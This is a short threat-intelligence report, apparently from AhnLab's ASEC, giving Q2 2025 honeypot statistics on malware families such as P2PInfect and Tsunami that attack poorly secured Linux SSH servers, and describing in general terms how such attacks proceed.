Statistical Report on Malware Targeting Linux SSH Servers in Q2 2025
Overview
AhnLab SEcurity intelligence Center (ASEC) conducts response and classification of brute force or dictionary attacks targeting poorly managed Linux SSH servers using honeypots. This report will cover the status of attack sources identified in the second quarter of 2025 based on logs, as well as statistics on attacks performed by these attack sources. Furthermore, malware used in each attack will be categorized with a summary of the statistical details.
Statistics
1. Status of Attacks on Linux SSH Servers
The following are statistics on attacks against Linux SSH servers identified through AhnLab’s honeypot logs in the second quarter of 2025. In the second quarter of 2025, the worm malware P2PInfect accounted for 50.0% of attacks while Tsunami accounted for 38.5%, the 2 types of malware occupying over 80%.
Figure 1. Attacks on Linux SSH servers in the 2nd quarter of 2025
The “Attack source” category refers to the quantity of systems used in attacks by malware or threat actors. In other words, systems where a history of actual malware installation commands being executed has been confirmed. ASEC honeypots collect logs related to attacks targeting poorly managed Linux SSH servers. In this instance, they are defined as environments vulnerable to brute force or dictionary attacks due to poorly configured account credentials. If a successful login occurs on inadequately managed systems, the malware or threat actor can gain control over those systems.
The “Attack status” shows the number of times threat actors or malware attacked the system. Attacks on poorly managed Linux SSH servers begin with scanning. After scanning, most attack attempts either end after obtaining account credentials through brute force or dictionary attacks, or after the subsequent phase of collecting basic information. In this report, we will summarize the statistical information based on cases that go beyond this stage and have confirmed logs of malware being installed.
